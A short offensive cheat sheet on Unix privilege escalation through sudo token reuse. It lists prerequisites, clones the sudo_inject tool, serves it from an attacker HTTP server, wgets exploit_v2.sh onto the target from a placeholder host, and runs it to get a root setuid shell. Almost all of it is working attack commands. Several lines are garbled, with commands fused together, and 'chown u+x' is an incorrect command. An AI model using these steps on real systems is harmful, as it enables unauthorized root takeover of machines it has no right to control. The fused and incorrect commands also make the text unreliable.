Privilege escalation on Unix.
Prerequisites
- You already have a shell as user “sampleuser”
- “sampleuser” have used sudo to execute something in the last 15mins (by default that’s the duration of the sudo token that allows to use sudo without introducing any password)
- gdb is accessible (you can be able to upload it)
- cat /proc/sys/kernel/yama/ptrace_scope is 0, or temporarily enable it:
echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scopeExploit
Download exploit here.
cd /home/kali/share
git clone https://github.com/nongiach/sudo_inject.git
cd sudo_inject
python3 -m http.server 80The second exploit (exploit_v2.sh) will create a sh shell in /tmp owned by root with setuid:
wget -O /tmp/exploit_v2.sh http://x.x.x.x/exploit_v2.sh
chown u+x exploit_v2.shcd /tmp
bash exploit_v2.sh
/tmp/sh -pwhoami # should be root